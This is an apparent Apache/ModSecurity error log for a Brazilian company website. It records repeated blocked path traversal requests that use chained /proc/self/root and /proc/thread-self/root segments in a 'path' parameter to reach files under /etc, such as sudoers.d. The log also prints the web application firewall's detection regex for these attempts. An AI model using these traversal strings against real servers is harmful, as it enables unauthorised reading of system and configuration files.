[hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuynIk7brgkOH-rIWcDwAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:43:08.117830 2026] [proxy_fcgi:error] [pid 26799:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:53150] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:43:08.272419 2026] [:error] [pid 29151:tid 140411674785536] [client 74.7.241.31:47660] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuzPPqhzTj3BvfDX-X1wAAAcg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:43:09.568216 2026] [:error] [pid 18380:tid 140411683178240] [client 74.7.241.31:47672] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuza4xEDsg_V3ESNZbdAAAAgc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:43:12.091159 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.241.31:47674] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmu0Na6ubjKNq_cu4YYZwAAA0I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:43:13.749796 2026] [:error] [pid 2598:tid 140411708356352] [client 74.7.241.31:47690] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmu0Rj0p0SRWAqcjGGJsQAAAwQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:43:15.075225 2026] [:error] [pid 25836:tid 140411616036608] [client 74.7.241.31:47694] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmu04h-PF_25v4hFRB7QAAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:43:17.349259 2026] [:error] [pid 18380:tid 140411548894976] [client 74.7.241.31:52658] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmu1a4xEDsg_V3ESNZbfAAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:43:18.821034 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.241.31:52660] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmu1tY0UrI5A3LftIwNegAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:43:20.305119 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.241.31:52662] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmu2Na6ubjKNq_cu4YYcQAAA0w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:43:21.345010 2026] [:error] [pid 18380:tid 140411616036608] [client 74.7.243.128:53738] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmu2a4xEDsg_V3ESNZbgAAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:43:23.342721 2026] [:error] [pid 25836:tid 140411607643904] [client 74.7.241.31:52666] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmu24h-PF_25v4hFRB7QgAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:43:24.633762 2026] [:error] [pid 29151:tid 140411741927168] [client 74.7.241.31:52668] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmu3PPqhzTj3BvfDX-X3QAAAcA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:43:25.947436 2026] [:error] [pid 18380:tid 140411658000128] [client 74.7.241.31:52680] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmu3a4xEDsg_V3ESNZbgwAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:43:27.220712 2026] [:error] [pid 18380:tid 140411641214720] [client 74.7.241.31:52692] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmu364xEDsg_V3ESNZbhgAAAgw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:43:28.481581 2026] [:error] [pid 7004:tid 140411725141760] [client 74.7.241.31:46580] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmu4MU6Sx0TG1YjmQi-jwAAAoI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:43:29.822056 2026] [:error] [pid 25836:tid 140411725141760] [client 74.7.241.31:46594] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmu4Yh-PF_25v4hFRB7QwAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:43:29.983163 2026] [:error] [pid 7004:tid 140411632822016] [client 74.7.243.128:48998] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmu4cU6Sx0TG1YjmQi-kAAAAo0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:43:31.097930 2026] [:error] [pid 7437:tid 140411616036608] [client 74.7.241.31:46596] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmu4weiSKl8TjouI-Yn0QAAA88"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:43:32.123389 2026] [proxy_fcgi:error] [pid 7437:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:53906] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:43:32.426080 2026] [:error] [pid 2598:tid 140411565680384] [client 74.7.241.31:46598] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmu5Bj0p0SRWAqcjGGJuAAAAxU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:43:33.695186 2026] [:error] [pid 29151:tid 140411658000128] [client 74.7.241.31:46610] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmu5fPqhzTj3BvfDX-X4AAAAco"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:43:35.011251 2026] [:error] [pid 2598:tid 140411708356352] [client 74.7.241.31:46622] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmu5xj0p0SRWAqcjGGJuQAAAwQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:43:36.311136 2026] [:error] [pid 7004:tid 140411574073088] [client 74.7.241.31:46638] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmu6MU6Sx0TG1YjmQi-kgAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
